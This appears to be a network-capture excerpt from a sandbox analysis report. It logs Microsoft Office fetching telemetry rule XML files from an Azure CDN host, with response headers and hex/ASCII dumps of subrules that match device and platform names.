                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            57192.168.2.44980613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:02 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:02 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:02 GMT
                                            Content-Type: text/xml
                                            Content-Length: 423
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                            ETag: "0x8DC582BB7564CE8"
                                            x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085802Z-174f7845968xr5c2hC1EWRd0hn0000000qk0000000004cg5
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:02 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            58192.168.2.44980813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:04 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:04 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:04 GMT
                                            Content-Type: text/xml
                                            Content-Length: 404
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                            ETag: "0x8DC582B95C61A3C"
                                            x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085804Z-174f7845968nxc96hC1EWRspw800000015g0000000002mcw
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:04 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            59192.168.2.44980713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:04 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:04 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:04 GMT
                                            Content-Type: text/xml
                                            Content-Length: 478
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                            ETag: "0x8DC582B9B233827"
                                            x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085804Z-174f7845968vqt9xhC1EWRgten00000015rg000000005kzr
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:04 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            60192.168.2.44980913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:04 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:04 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:04 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                            ETag: "0x8DC582BB046B576"
                                            x-ms-request-id: cdcb5222-c01e-0014-44bd-42a6a3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085804Z-174f78459685726chC1EWRsnbg00000015ug00000000220a
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            61192.168.2.44981013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:04 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:04 UTC491INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:04 GMT
                                            Content-Type: text/xml
                                            Content-Length: 400
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                            ETag: "0x8DC582BB2D62837"
                                            x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085804Z-174f78459688l8rvhC1EWRtzr00000000k5g00000000bh93
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:04 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            62192.168.2.44981113.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:04 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:04 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:04 GMT
                                            Content-Type: text/xml
                                            Content-Length: 479
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                            ETag: "0x8DC582BB7D702D0"
                                            x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085804Z-174f7845968jrjrxhC1EWRmmrs00000015ug0000000057u7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:04 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            63192.168.2.44981213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:06 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:06 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:06 GMT
                                            Content-Type: text/xml
                                            Content-Length: 425
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                            ETag: "0x8DC582BBA25094F"
                                            x-ms-request-id: b8a9d872-301e-003f-6bb3-42266f000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085806Z-174f7845968pf68xhC1EWRr4h800000015vg000000008qbs
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:06 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            64192.168.2.44981313.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:06 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:06 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:06 GMT
                                            Content-Type: text/xml
                                            Content-Length: 475
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                            ETag: "0x8DC582BB2BE84FD"
                                            x-ms-request-id: 2c2c8243-201e-006e-2a02-45bbe3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085806Z-174f7845968psccphC1EWRuz9s00000015y0000000005qmr
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:06 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            65192.168.2.44981413.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:06 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:06 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:06 GMT
                                            Content-Type: text/xml
                                            Content-Length: 448
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                            ETag: "0x8DC582BB389F49B"
                                            x-ms-request-id: 07e13988-c01e-0049-0444-44ac27000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085806Z-174f7845968zgtf6hC1EWRqd8s0000000ymg0000000078wq
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:06 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            66192.168.2.44981513.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:06 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:07 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:06 GMT
                                            Content-Type: text/xml
                                            Content-Length: 491
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B98B88612"
                                            x-ms-request-id: 5448956e-901e-0048-3ef9-44b800000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085806Z-174f7845968cs2nkhC1EWR2tq00000000190000000009149
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:07 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            67192.168.2.44981613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:06 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:07 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:07 GMT
                                            Content-Type: text/xml
                                            Content-Length: 416
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                            ETag: "0x8DC582BAEA4B445"
                                            x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085807Z-174f78459688l8rvhC1EWRtzr00000000kbg000000002h69
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
